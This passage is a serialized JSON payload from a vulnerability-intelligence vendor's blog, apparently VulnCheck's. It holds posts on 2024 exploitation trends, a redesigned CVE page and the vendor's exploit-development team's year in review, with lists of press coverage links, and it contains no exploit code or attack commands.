CVE-2025-0890.",{"slug":57668},"zyxel-telnet-vulns","\u002Fblog\u002Fzyxel-telnet-vulns",{"title":55260,"description":57666},"blog\u002Fzyxel-telnet-vulns",[242,1281,1279],"yD9frnM0KtVKw6OLTyKOEgFvjL6mDmSjxT3RbZI3w4g",{"id":57675,"title":57676,"articles":57677,"authors":57740,"body":57742,"date":57682,"description":57889,"extension":234,"image":7,"link":7,"meta":57890,"navigation":237,"path":57892,"seo":57893,"series":7,"stem":57894,"subtype":7,"tags":57895,"__hash__":57896},"blog\u002Fblog\u002F2024-exploitation-trends.md","2024 Trends in Vulnerability Exploitation",[57678,57683,57686,57690,57693,57696,57699,57702,57705,57709,57713,57717,57721,57726,57729,57732,57736],{"title":57679,"source":57680,"link":57681,"date":57682},"768 CVEs Exploited in the Wild in 2024","InfoSecurity Magazine","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fcves-exploited-wild-2024\u002F","2025-02-03",{"title":57684,"source":14382,"link":57685,"date":57682},"768 CVEs Exploited in 2024, Reflecting a 20% Increase from 639 in 2023","https:\u002F\u002Fthehackernews.com\u002F2025\u002F02\u002F768-cves-exploited-in-2024-reflecting.html",{"title":57687,"source":57688,"link":57689,"date":57682},"768 Vulnerabilities Exploited in the Wild in 2024: A 20% Year-Over-Year Surge","CyberSecurity News","https:\u002F\u002Fcybersecuritynews.com\u002F768-vulnerabilities-exploited\u002F",{"title":57691,"source":33995,"link":57692,"date":57682},"Record number of exploited security vulnerabilities reached in 2024","https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Frecord-number-of-exploited-security-vulnerabilities-reached-in-2024",{"title":57694,"source":14378,"link":57695,"date":57665},"Exploitation of Over 700 Vulnerabilities Came to Light in 2024","https:\u002F\u002Fwww.securityweek.com\u002Fexploitation-of-over-700-vulnerabilities-came-to-light-in-2024\u002F",{"title":57697,"source":43752,"link":57698,"date":57665},"Channel Brief: Qualys Launches TotalAppSec Solution","https:\u002F\u002Fwww.channele2e.com\u002Fnews\u002Fchannel-brief-qualys-launches-totalappsec-solution",{"title":57700,"source":30021,"link":57701,"date":57665},"Report: CVE Disclosures Reach New Highs Last Year","https:\u002F\u002Fwww.enterprisesecuritytech.com\u002Fpost\u002Freport-cve-disclosures-reach-new-highs-last-year",{"title":57703,"source":251,"link":57704,"date":57665},"MSSP Market Update: Riot Security Raises $30M for Cybersecurity Training","https:\u002F\u002Fwww.msspalert.com\u002Fnews\u002Fmssp-market-update",{"title":57706,"source":57707,"link":57708,"date":57665},"768 CVEs Exploited in the Wild in 2024: A 20% Increase Noted","RedPacket Security","https:\u002F\u002Fwww.redpacketsecurity.com\u002F768-cves-exploited-in-the-wild-in-2024\u002F",{"title":57710,"source":57711,"link":57712,"date":57665},"VulnCheck Report Says Exploited CVEs Up 20% In 2024","The IT Nerd","https:\u002F\u002Fitnerd.blog\u002F2025\u002F02\u002F04\u002Fvulncheck-report-says-exploited-cves-up-20-in-2024\u002F",{"title":57714,"source":57715,"link":57716,"date":57665},"768 Vulnerabilities Were Actively Attacked Last Year","SC Mag UK","https:\u002F\u002Finsight.scmagazineuk.com\u002F768-vulnerabilities-were-actively-attacked-last-year",{"title":57718,"source":57719,"link":57720,"date":55249},"768 vulnerabilities were exploited by hackers in 2024","HackMag","https:\u002F\u002Fhackmag.com\u002Fnews\u002Fcve-exploitation\u002F",{"title":57722,"source":57723,"link":57724,"date":57725},"Vulnerability exploits were up in 2024 (and so was information sharing)","ITBrew","https:\u002F\u002Fwww.itbrew.com\u002Fstories\u002F2025\u002F02\u002F12\u002Fvulnerability-exploits-were-up-in-2024-and-so-was-information-sharing","2025-02-12",{"title":57727,"source":12182,"link":57728,"date":54944},"24% of vulnerabilities are abused before a patch is available","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F3823429\u002F24-of-vulnerabilities-are-abused-before-a-patch-is-available.html",{"title":57730,"source":11228,"link":57731,"date":45079},"Is Ivanti the problem or a symptom of a systemic issue with network devices?","https:\u002F\u002Fcyberscoop.com\u002Fivanti-exploited-vulnerabilities-network-edge-devices-kev-list\u002F",{"title":57733,"source":11218,"link":57734,"date":57735},"Proof-of-Concept in 15 Minutes? AI Turbocharges Exploitation","https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Fproof-concept-15-minutes-ai-turbocharges-exploitation","2025-08-29",{"title":57737,"source":57738,"link":57739,"date":19502},"Not every security vulnerability means you need to update right now — here's how to know which ones do","MUO","https:\u002F\u002Fwww.makeuseof.com\u002Fnot-every-security-vulnerability-means-you-need-to-update-right-now\u002F",[57741],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":57743,"toc":57881},[57744,57746,57760,57767,57771,57779,57783,57788,57791,57805,57808,57810,57813,57825,57829,57835,57838,57849,57852,57856,57859,57870,57872,57874,57876],[61,57745,20],{"id":3520},[22,57747,57748,57751,57754,57757],{},[25,57749,57750],{},"768 CVEs were publicly reported as exploited in the wild; up 20% YoY",[25,57752,57753],{},"Spikes in volume of CVE reporting link back to key industry events and new sources",[25,57755,57756],{},"In 2024, 23.6% of KEVs were known to be exploited on or before the day their CVEs were publicly disclosed",[25,57758,57759],{},"There were over 100 unique sources to be the first to report an CVE with third-party vendors leading the charge (i.e. Security companies (e.g., CheckPoint, Aqua Security, Fortinet, F5), government agencies (e.g., DOD, CISA, NHS), and non-profits (e.g., Shadow Server)",[18,57761,57762,57763,57766],{},"2024 marked another banner year for threat actors targeting the exploitation of vulnerabilities. Exploitation disclosures came from various sources, including product companies, security vendors, government agencies, non-profits, and media outlets worldwide. This blog post examines broader trends across exploited vulnerabilities where exploitation was first publicly disclosed in 2024, leveraging insights from ",[47,57764,1233],{"href":2871,"rel":57765},[51],", a free community resource launched at the beginning of 2024.",[1920,57768,57770],{"id":57769},"growth-in-publicly-reported-exploitation","Growth in Publicly Reported Exploitation",[18,57772,57773,57774,57778],{},"In 2024, VulnCheck identified 768 CVEs that were publicly reported as exploited in the wild for the first time. This is an increase of 20% from 2023 when there were 639 CVEs that were publicly reported as exploited in the wild for the first time. During 2024, 1% of the CVEs published were reported publicly as exploited in the wild, aligning closely with historical trends outlined in our ",[47,57775,57777],{"href":44893,"rel":57776},[51],"State of Exploitation Report",". This number is expected to grow as exploitation is often discovered long after a CVE is published.",[61,57780,57782],{"id":57781},"how-many-vulnerabilities-are-reported-to-be-exploited-each-month-for-the-first-time","How many vulnerabilities are reported to be exploited each month for the first time?",[18,57784,57785],{},[68,57786],{"alt":43858,"src":57787,"width":28205},"\u002Fblog\u002F2024-exploitation-trends\u002F2024-kev-source.png",[18,57789,57790],{},"By analyzing reported exploitation by month, we gain a better understanding of the volume of CVEs that are likely to require immediate attention as they are discovered to be exploited in the wild. While the baseline of exploited CVEs ranged from 30-50 per month, notable spikes were observed during certain periods:",[22,57792,57793,57796,57799,57802],{},[25,57794,57795],{},"April\u002FMay: Increased reports during RSA and end-of-quarter reports.",[25,57797,57798],{},"Onboarding of New Sources: The onboarding of ShadowServer into January.",[25,57800,57801],{},"F5\u002FCISA & DOD Reports: Industry reports, including the Flax Typhoon botnet disclosure.",[25,57803,57804],{},"Wordfence Disclosures: We coordinated with Wordfence, which issued CVEs for vulnerabilities they had evidence for but no CVE ID.",[18,57806,57807],{},"These spikes underscore how industry events and new resources impact reporting volumes on exploitation.We encourage organizations to publicly disclose any instances where there is exploitation activity.",[61,57809,37327],{"id":37326},[18,57811,57812],{},"A common concern is how quickly vulnerabilities are exploited after disclosure. In 2024, 23.6% of KEVs were known to be exploited on or before the day their CVEs were publicly disclosed, a slight decrease from 2023's 27%. Despite the buzz around \"zero-day\" exploitation, these findings indicate that exploitation can happen at any time in a vulnerability's lifecycle.",[18,57814,57815,57819,57820],{},[68,57816],{"alt":57817,"src":57818,"width":28205},"Speed to KEV","\u002Fblog\u002F2024-exploitation-trends\u002Fexploitation-timeline.png","\nSource: ",[47,57821,57824],{"href":57822,"rel":57823},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fjupyter-notebooks\u002Ftree\u002Fmain\u002Fexploitation-timeline",[51],"VulnCheck Exploitation Timelne Jupyter Notebook",[61,57826,57828],{"id":57827},"who-is-the-first-to-publicly-report-exploitation","Who is the First to Publicly Report Exploitation?",[18,57830,57831],{},[68,57832],{"alt":57833,"src":57834,"width":28205},"Earliest Reporter","\u002Fblog\u002F2024-exploitation-trends\u002F2024-earliest-reporter.png",[18,57836,57837],{},"Of the 768 CVEs first reported as exploited in 2024, 112 unique sources provided initial evidence. These sources include:",[22,57839,57840,57843,57846],{},[25,57841,57842],{},"Third Parties: Security companies (e.g., CheckPoint, Aqua Security, Fortinet, F5), government agencies (e.g., DOD, CISA, NHS), and non-profits (e.g., Shadow Server).",[25,57844,57845],{},"Product Companies: Microsoft, Google, Apple, Cisco, Ivanti, and others frequently disclosed exploitation of their own products, as well as third-party vulnerabilities.",[25,57847,57848],{},"Social Media \u002F Blogs: Infosec Exchange, X, Linkedin, Medium",[18,57850,57851],{},"VulnCheck KEV was created to provide security teams with early and broad visibility into exploited vulnerabilities regardless of where the disclosure happens. Our mission remains to empower defenders by offering this resource free of charge.",[61,57853,57855],{"id":57854},"considerations-bias","Considerations \u002F Bias",[18,57857,57858],{},"We make a strong effort to be as transparent as possible with our research and you can also validate it yourself with free access to VulnCheck KEV. Here are some considerations that might pose Bias in our research:",[1789,57860,57861,57864,57867],{},[25,57862,57863],{},"We onboarded ShadowServer over a three month period starting in November 2023. Several of these CVEs are likely to have been identified prior to us adding this as a source so there is likely an increase in the number of CVEs associated with Shadow Server that could be attributed to an earlier date.",[25,57865,57866],{},"We worked with Wordfence to coordinate the disclosure of CVEs that were being exploited which we outlined above.",[25,57868,57869],{},"It’s possible there are other resources for public exploitation that we haven’t captured. Therefore, if you are aware of any CVEs we missed exploitation evidence on, please let us know. Generally, we find that things that are widely exploited tend to surface publicly pretty quickly.",[61,57871,202],{"id":201},[18,57873,45062],{},[18,57875,208],{},[18,57877,211,57878,45071],{},[47,57879,216],{"href":214,"rel":57880},[51],{"title":219,"searchDepth":220,"depth":220,"links":57882},[57883,57884,57885,57886,57887,57888],{"id":3520,"depth":220,"text":20},{"id":57781,"depth":220,"text":57782},{"id":37326,"depth":220,"text":37327},{"id":57827,"depth":220,"text":57828},{"id":57854,"depth":220,"text":57855},{"id":201,"depth":220,"text":202},"In September, VulnCheck identified evidence of 78 CVEs that were publicly disclosed for the first time as exploited in the wild.",{"slug":57891},"2024-exploitation-trends","\u002Fblog\u002F2024-exploitation-trends",{"title":57676,"description":57889},"blog\u002F2024-exploitation-trends",[1280,242,1279],"TupBAwy7llRpapyrecdlq5AEQOL0CVzEQzMbka60Wuo",{"id":57898,"title":57899,"articles":7,"authors":57900,"body":57903,"date":58055,"description":58056,"extension":234,"image":7,"link":7,"meta":58057,"navigation":237,"path":58059,"seo":58060,"series":7,"stem":58061,"subtype":7,"tags":58062,"__hash__":58063},"blog\u002Fblog\u002Fnew-year-new-ui.md","New Year, New UI",[57901],{"name":3256,"avatar":3257,"link":3258,"linkName":57902},"kimberduke",{"type":15,"value":57904,"toc":58049},[57905,57911,57914,57917,57920,57923,57927,57930,57938,57944,57967,57971,57974,57977,57982,58008,58012,58042,58046],[18,57906,57907],{},[68,57908],{"alt":57909,"src":57910,"width":28205},"Customer CVE Page","\u002Fblog\u002Fnew-year-new-ui\u002Fcve-customer.png",[18,57912,57913],{},"Ever tried to look up a CVE? Quickly, accurately, without wading through a mess of outdated or incomplete data? If you've been in the trenches of vulnerability management, you know the struggle. When I joined VulnCheck, one of the first things I noticed was how fragmented and inefficient this process can be across the industry.",[18,57915,57916],{},"A strong cybersecurity program starts with knowing your vulnerabilities. Getting that information shouldn’t be a hassle, it should be clear, actionable, and fast. That’s why we’ve overhauled the VulnCheck CVE page. This update brings threat intelligence front and center, refines the layout, and makes navigation seamless. The result? A more intuitive, threat centric approach to analyzing vulnerabilities and prioritize what matters.",[18,57918,57919],{},"And it's not just the CVE, it's having the context around that CVE with visibility into how that specific vulnerability is impacting an organization. Or threat actor linkages. Or MITRE techniques. Or ransomware and botnet attribution. Or botnets. So, depending categorically what you’re monitoring, that might be 100 or 1000 CVEs that you need to analyze. The nice thing about what we’ve built is we’ve customized the experience to make it easy, simple and straight-forward to get to what matters.",[18,57921,57922],{},"This is a big step forward in making vulnerability intelligence more accessible and effective. Because when it comes to securing your environment, speed and accuracy make all the difference.",[61,57924,57926],{"id":57925},"enhancements-in-vulncheck-community-edition","Enhancements in VulnCheck Community Edition",[18,57928,57929],{},"When a new CVE drops, is it just another entry in the database, or is it already being exploited in the wild? Our goal is to help the community understand this at a glance, and being the fastest reference to do so. The updated VulnCheck CVE Details page gives you a clear view of a vulnerability’s entire lifecycle, whether it’s newly assigned, actively exploited, or somewhere in between.",[18,57931,57932,57933,57937],{},"VulnCheck users with a ",[47,57934,57936],{"href":40745,"rel":57935},[51],"free Community account"," can see the following:",[18,57939,57940],{},[68,57941],{"alt":57942,"src":57943,"width":28205},"Community CVE Page","\u002Fblog\u002Fnew-year-new-ui\u002Fcve-community.png",[22,57945,57946,57949,57952,57955,57958,57961,57964],{},[25,57947,57948],{},"Quickly see if a CVE is known to be exploited or just assigned, with clear indicators on every step in its progression",[25,57950,57951],{},"See a vulnerabiltiies timeline such as when the CVE was published, when CISA added it to KEV, when NVD published, and if any updates have been made by NVD.",[25,57953,57954],{},"See what products are impacted using either NVD or VulnCheck CPE.",[25,57956,57957],{},"Direct access to exploitation reference.",[25,57959,57960],{},"Access to Exploits currated in VulnCheck's Exploit Database (XDB). This is a curated index of PoC code from Git repositories, compiled with human validation and automated screening.\nComprehensive references to everything you need in one place, including vendor patches (when available), so you can move from awareness to action fast.",[25,57962,57963],{},"A quick link to the JSON is available as well as a link to API's that community members have access to.",[25,57965,57966],{},"CVSS-B scoring.",[61,57968,57970],{"id":57969},"benefits-to-vulncheck-customers","Benefits to VulnCheck Customers",[18,57972,57973],{},"Our customers know, not all vulnerabilities are equal. Some remain dormant, while others quickly become weapons for botnets, ransomware, and targeted attacks. As a security leader, you need to know which CVEs pose a real threat… and how.",[18,57975,57976],{},"Here’s a few things that are new in the VulnCheck CVE page for customers:",[18,57978,57979],{},[68,57980],{"alt":57909,"src":57981,"width":28205},"\u002Fblog\u002Fnew-year-new-ui\u002Fcve-threat.png",[22,57983,57984,57987,57990,57993,57996,57999,58002,58005],{},[25,57985,57986],{},"Instantly see where a vulnerability stands with easy to read tiles. Are threat actors exploiting it? Is it linked to botnets, ransomware, weaponized exploits, or just a proof-of-concept?\nGo beyond basic CVSS Base Score with EPSS, CVSS-BT, and SSVC for a deeper risk assessment.",[25,57988,57989],{},"Gain a global view of exposure with potentially vulnerable IPs, sorted by country.",[25,57991,57992],{},"Utilize the MITRE ATT&CK mappings to quickly assess how a vulnerability aligns with adversary tactics and techniques to strengthen your defenses.",[25,57994,57995],{},"See exactly who is leveraging the vulnerability, whether it’s cybercriminals, state-sponsored groups, or botnets.",[25,57997,57998],{},"Our enhanced exploitation timeline gives a more detailed breakdown of when exploitation was first observed, giving you the edge in response.",[25,58000,58001],{},"Prioritization systems including Stakeholder Specific Vulnerability Categorization (SSVC), CVSS-BT Enrichment and EPSS.",[25,58003,58004],{},"Detections including VulnCheck, Emerging Threats, SigmaHQ, CheckPoint, etc.",[25,58006,58007],{},"Early Visibility into CVEs not published yet.",[61,58009,58011],{"id":58010},"using-the-new-cve-page","Using the New CVE Page",[1789,58013,58014,58025,58031,58036],{},[25,58015,58016,58019,58020,58024],{},[1131,58017,58018],{},"Login to VulnCheck:"," Navigate to ",[47,58021,58022],{"href":58022,"rel":58023},"https:\u002F\u002Fvulncheck.com\u002Fhome",[51]," to create an account or login.",[25,58026,58027,58030],{},[1131,58028,58029],{},"Search for a CVE:"," Use the search bar in the top left hand corner to enter a CVE ID.",[25,58032,58033],{},[1131,58034,58035],{},"Enjoy the Data!",[25,58037,58038,58041],{},[1131,58039,58040],{},"Integrate with Your Tools"," Export the data using the JSON tab, the link to the API, or contact sales so we can help figure out the best way to integrate into your toolset.",[61,58043,58045],{"id":58044},"the-future-is-here","The Future is Here",[18,58047,58048],{},"This update is just the beginning. We’re constantly pushing to make vulnerability and exploit intelligence faster, sharper, and more actionable. If you’ve got feedback, we’re listening! And most importantly, stay tuned because there’s more on the way.",{"title":219,"searchDepth":220,"depth":220,"links":58050},[58051,58052,58053,58054],{"id":57925,"depth":220,"text":57926},{"id":57969,"depth":220,"text":57970},{"id":58010,"depth":220,"text":58011},{"id":58044,"depth":220,"text":58045},"2025-01-30","VulnCheck's new update enhances our CVE pages bringing actionable threat intelligence to the forefront.",{"slug":58058},"new-year-new-ui","\u002Fblog\u002Fnew-year-new-ui",{"title":57899,"description":58056},"blog\u002Fnew-year-new-ui",[242,1280,28705],"dm5OSYzikJ6364Nh6NyYaJw_PS_G8seg4N-RiYYdxig",{"id":58065,"title":58066,"articles":58067,"authors":58071,"body":58073,"date":58350,"description":58351,"extension":234,"image":7,"link":7,"meta":58352,"navigation":237,"path":58354,"seo":58355,"series":7,"stem":58356,"subtype":7,"tags":58357,"__hash__":58358},"blog\u002Fblog\u002Fvulncheck-iai-2024.md","VulnCheck Initial Access Intelligence - 2024 Year in Review",[58068],{"title":58069,"source":12157,"link":58070,"date":57682},"Risky Bulletin: CISA & FDA warn of backdoor in patient monitor","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-fda-warns-of-backdoor-in-patient-monitor\u002F",[58072],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":58074,"toc":58343},[58075,58081,58083,58103,58107,58114,58121,58124,58151,58154,58158,58161,58165,58172,58175,58188,58195,58203,58207,58210,58215,58218,58222,58225,58252,58256,58259,58316,58318,58332],[18,58076,58077],{},[68,58078],{"alt":58079,"src":58080,"width":28205},"IAI 2024","\u002Fblog\u002Fvulncheck-iai-2024\u002Fiai-2024.png",[1920,58082,20],{"id":3520},[22,58084,58085,58088,58091,58094,58097,58100],{},[25,58086,58087],{},"In 2024, VulnCheck's Initial Access Intelligence (IAI) team delivered custom exploits and detection artifacts for 169 CVEs.",[25,58089,58090],{},"Among these, 99 CVEs (58.6%) were actively exploited in the wild.",[25,58092,58093],{},"For 27 CVEs, IAI coverage was provided before exploitation in the wild was reported, helping customers stay ahead of attackers by an average of two CVEs per month.",[25,58095,58096],{},"Additionally, 17 CVEs not yet known to be exploited in the wild have malicious activity on GreyNoise tags or queries generated by the IAI team.",[25,58098,58099],{},"Nine of the CVEs were zero-day vulnerabilities, with VulnCheck offering advanced warnings to its customers.",[25,58101,58102],{},"The go-exploit framework saw significant improvements to the C2 system and a novel scanless feature.",[1920,58104,58106],{"id":58105},"introduction-to-initial-access-intelligence-iai","Introduction to Initial Access Intelligence (IAI)",[18,58108,58109,58110,58113],{},"VulnCheck delivers ",[47,58111,216],{"href":214,"rel":58112},[51]," through a robust, automated system that gathers extensive metadata for every vulnerability documented across the internet.",[18,58115,58116,58117,58120],{},"Complementing this offering is VulnCheck's ",[47,58118,1245],{"href":45535,"rel":58119},[51],". This offering focuseson carefully curated exploits, detections, scanners, and queries targeting the most critical vulnerabilities. Together, these services provide a balanced approach: broad, high-level insights for all vulnerabilities and in-depth analysis of the most significant threats.",[18,58122,58123],{},"Our Initial Access Intelligence aims to give users a complete understanding of the vulnerability and how to find it. The data isn’t targeted at any one demographic. Red teams, detection engineers, vulnerability management groups, attack surface management, incident response pros all would find this information useful. When possible, the IAI team develops:",[22,58125,58126,58133,58136,58139,58142,58145,58148],{},[25,58127,58128,58129,58132],{},"In-house exploits using our ",[47,58130,20558],{"href":14297,"rel":58131},[51]," framework, which incorporate asset discovery and version scanning capabilities.",[25,58134,58135],{},"Search engine queries for finding exploitable systems. Currently supporting: Censys, Shodan, FOFA, ZoomEye, Google, and Baidu.",[25,58137,58138],{},"GreyNoise queries for identifying ongoing attacks in the wild.",[25,58140,58141],{},"Snort and Suricata network signatures for detecting active exploitation.",[25,58143,58144],{},"PCAPs that capture exploitation attempts or malicious behavior.",[25,58146,58147],{},"YARA rules tailored for identifying indicators of compromise.",[25,58149,58150],{},"Vulnerable docker images to support testing and analysis efforts.",[18,58152,58153],{},"This extensive package equips users with the tools needed to not only detect vulnerabilities but also analyze and simulate exploitation scenarios.",[61,58155,58157],{"id":58156},"new-iai-coverage-in-2024","New IAI Coverage in 2024",[18,58159,58160],{},"In 2024, the IAI team delivered coverage for 169 CVEs, covering 101 different vendors.",[18,58162,58163],{},[68,58164],{"alt":58079,"src":58080,"width":28205},[18,58166,58167,58168,58171],{},"Leading the way in coverage, perhaps surprisingly to some, was the Apache Project. The Apache Project is the steward of many important software projects. There were so many that there were 17 Apache Project CVEs added to ",[47,58169,1233],{"href":2871,"rel":58170},[51]," in 2024 (only five of which are listed in CISA KEV).",[18,58173,58174],{},"Unsurprisingly, router and VPN manufacturers like Zyxel, Palo Alto Networks, Ivanti, and Fortinet followed Apache. These products are staples for any effective initial access team: they are challenging to monitor, not always easy to patch, and frequently exposed directly to the internet by design. Each of these vendors faced significant vulnerabilities in 2024 that warranted in-depth analysis by VulnCheck’s team.",[18,58176,58177,58178,58182,58183,59],{},"Also notable on the graph are enterprise vendors like Fortra, Progress, and SolarWinds. These companies’ products are fixtures in enterprise environments but continue to feature prominently on known exploitable target lists year after year. This persistent pattern underscores the importance of monitoring these solutions for vulnerabilities that attackers are quick to exploit.\nIn total, the team would cover 99 vulnerabilities that had been exploited in the wild. Some of our coverage was in the “rapid response” style, like for ",[47,58179,1510],{"href":58180,"rel":58181},"https:\u002F\u002Fvulncheck.com\u002Fcve\u002FCVE-2024-4577",[51]," (affecting PHP) in which the team delivered content one day before the CVE was even published. But the team also worked on important historical vulnerabilities like Sophos CVE-2020-25223 with the knowledge that attackers ",[47,58184,58187],{"href":58185,"rel":58186},"http:\u002F\u002FCVE-2020-25223",[51],"still pursue the vulnerability today",[18,58189,58190,58191,58194],{},"The team has also generated coverage for 61 CVEs that have not been exploited in the wild ",[1131,58192,58193],{},"yet",", but have a high probability of being targeted in the future. That includes targets that have been in VulnCheck KEV before, like TeamCity (CVE-2024-23917), Spring Cloud (CVE-2024-37084), and Sonatype Nexus (CVE-2024-4956). That also includes some things off the beaten path, like Anyscale Ray (CVE-2023-6019), Traccar (CVE-2024-31214), and Laravel (CVE-2024-29291). The team focuses on not just what is well-known to US enterprises, but also global attackers.",[18,58196,58197,58198,59],{},"Finally, as part of this work, the team inevitably finds zero-day vulnerabilities, of which we found nine in the last year. We handle these by providing detection to our customers and then working on disclosure with the vendor according to our ",[47,58199,58202],{"href":58200,"rel":58201},"https:\u002F\u002Fvulncheck.com\u002Fvulnerability-disclosure-policy",[51],"disclosure policy",[61,58204,58206],{"id":58205},"delivery-of-vulncheck-initial-access-artifacts","Delivery of VulnCheck Initial Access Artifacts",[18,58208,58209],{},"Around May 2024, the Initial Access team doubled in size, resulting in a significant increase in monthly deliverables.",[18,58211,58212],{},[68,58213],{"alt":58079,"src":58214,"width":28205},"\u002Fblog\u002Fvulncheck-iai-2024\u002Fiai-2024-monthly.png",[18,58216,58217],{},"The team strives to consistently provide actionable intelligence on a minimum of four vulnerabilities per week (on average).By definition, all the vulnerabilities we work on are essential, so such detailed coverage is a boon to any organization.",[61,58219,58221],{"id":58220},"expanded-capabilities","Expanded Capabilities",[18,58223,58224],{},"The team doesn’t just focus on providing coverage for vulnerabilities. We are also intensely interested in how they can be exploited in real world scenarios. That requires maintenance of our exploit framework go-exploit. This year, we saw three major updates:",[22,58226,58227,58236,58244],{},[25,58228,58229,58230,58235],{},"In ",[47,58231,58234],{"href":58232,"rel":58233},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fvulncheck-goes-scanless",[51],"July",", we updated go-exploit to allow for the exploits to share information across runs. This makes go-exploit the only exploit framework to scan HTTP targets without ever connecting to them!",[25,58237,58229,58238,58243],{},[47,58239,58242],{"href":58240,"rel":58241},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fgo-exploit-shelltunnel",[51],"October",", we expanded the capabilities of go-exploit to include a new command and control feature called ShellTunnel which captures reverse shell traffic and routes it through an intermediary server before sending it on to the primary C2 server",[25,58245,58229,58246,58251],{},[47,58247,58250],{"href":58248,"rel":58249},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fgo-exploit-external-c2s",[51],"September",", we added external C2s to go-exploit. This feature enables community members to create C2 channels and payloads with direct integration into the go-exploit framework. The changes initially pushed in 1.25.0 give go-exploit the flexibility to import external C2 modules and define multiple types of external C2s.",[61,58253,58255],{"id":58254},"the-blogging-highlights","The Blogging Highlights",[18,58257,58258],{},"Finally, the team loves to blog and share details of our work when possible. The following is a listing of the interesting blogs the IAI team helped develop in 2024:",[22,58260,58261,58266,58273,58280,58285,58292,58297,58302,58309],{},[25,58262,58263],{},[47,58264,22211],{"href":53842,"rel":58265},[51],[25,58267,58268],{},[47,58269,58272],{"href":58270,"rel":58271},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fofbiz-cve-2023-51467",[51],"Weaponizing Apache OFBiz CVE-2023-51467",[25,58274,58275],{},[47,58276,58279],{"href":58277,"rel":58278},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fip-intel-7777-botnet",[51],"7777-Botnet Infection Vectors",[25,58281,58282],{},[47,58283,53826],{"href":53824,"rel":58284},[51],[25,58286,58287],{},[47,58288,58291],{"href":58289,"rel":58290},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Ftoo-many-honeypots",[51],"There Are Too Many Damn Honeypots",[25,58293,58294],{},[47,58295,58272],{"href":58270,"rel":58296},[51],[25,58298,58299],{},[47,58300,36637],{"href":53833,"rel":58301},[51],[25,58303,58304],{},[47,58305,58308],{"href":58306,"rel":58307},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fexploring-abb-ics-vulns",[51],"Exploring ABB Vulnerabilities and Their Impact on Industrial Control Systems",[25,58310,58311],{},[47,58312,58315],{"href":58313,"rel":58314},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fzyxel-cve-2023-33012",[51],"re: Zyxel VPN Series Pre-auth Remote Command Execution",[61,58317,202],{"id":201},[18,58319,53821,58320,1246,58323,1246,58326,1255,58329],{},[47,58321,40447],{"href":53829,"rel":58322},[51],[47,58324,36637],{"href":53833,"rel":58325},[51],[47,58327,55229],{"href":53837,"rel":58328},[51],[47,58330,22211],{"href":53842,"rel":58331},[51],[18,58333,53846,58334,53850,58337,982,58340,1260],{},[47,58335,1233],{"href":2871,"rel":58336},[51],[47,58338,1245],{"href":45535,"rel":58339},[51],[47,58341,216],{"href":214,"rel":58342},[51],{"title":219,"searchDepth":220,"depth":220,"links":58344},[58345,58346,58347,58348,58349],{"id":58156,"depth":220,"text":58157},{"id":58205,"depth":220,"text":58206},{"id":58220,"depth":220,"text":58221},{"id":58254,"depth":220,"text":58255},{"id":201,"depth":220,"text":202},"2025-01-29","In 2024, VulnCheck's Initial Access Intelligence (IAI) team delivered custom exploits and detection artifacts for 169 CVEs. Among these, 99 CVEs (58.6%) were actively exploited in the wild.",{"slug":58353},"vulncheck-iai-2024","\u002Fblog\u002Fvulncheck-iai-2024",{"title":58066,"description":58351},"blog\u002Fvulncheck-iai-2024",[1281,1279,242,1280],"2cA4Df652_AW8iJJeQMHuGrHI-7KFg6z8PfyKkZLxZE",{"id":58360,"title":53826,"articles":58361,"authors":58440,"body":58442,"date":58573,"description":58574,"extension":234,"image":7,"link":7,"meta":58575,"navigation":237,"path":58577,"seo":58578,"series":7,"stem":58579,"subtype":7,"tags":58580,"__hash__":58581},"blog\u002Fblog\u002Ffour-faith-cve-2024-12856.md",[58362,58366,58370,58373,58375,58377,58380,58382,58384,58386,58389,58391,58394,58396,58398,58400,58403,58406,58409,58413,58417,58421,58425,58428,58431,58436],{"title":58363,"source":14382,"link":58364,"date":58365},"15,000+ Four-Faith Routers Exposed to New Exploit Due to Default Credentials","https:\u002F\u002Fthehackernews.com\u002F2024\u002F12\u002F15000-four-faith-routers-exposed-to-new.html","2024-12-28",{"title":58367,"source":19479,"link":58368,"date":58369},"Four-Faith Routers Exploited Using New Flaw","https:\u002F\u002Fwww.bankinfosecurity.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179","2024-12-30",{"title":58371,"source":14373,"link":58372,"date":58369},"Hackers exploit Four-Faith router flaw to open reverse shells","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-exploit-four-faith-router-flaw-to-open-reverse-shells\u002F",{"title":58367,"source":32210,"link":58374,"date":58369},"https:\u002F\u002Fwww.careersinfosecurity.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58367,"source":32213,"link":58376,"date":58369},"https:\u002F\u002Fwww.cuinfosecurity.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58378,"source":11228,"link":58379,"date":58369},"Thousands of industrial routers vulnerable to command injection flaw","https:\u002F\u002Fcyberscoop.com\u002Fiot-command-injection-industrial-routers-four-faith-mirai\u002F",{"title":58367,"source":32216,"link":58381,"date":58369},"https:\u002F\u002Fwww.databreachtoday.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58367,"source":32207,"link":58383,"date":58369},"https:\u002F\u002Fwww.devicesecurity.io\u002Four-faith-routers-exploited-using-new-flaw-a-27179",{"title":58367,"source":32219,"link":58385,"date":58369},"https:\u002F\u002Fwww.fraudtoday.io\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58387,"source":25672,"link":58388,"date":58369},"Four-Faith Industrial Routers Vulnerability Exploited in the Wild to Gain Remote 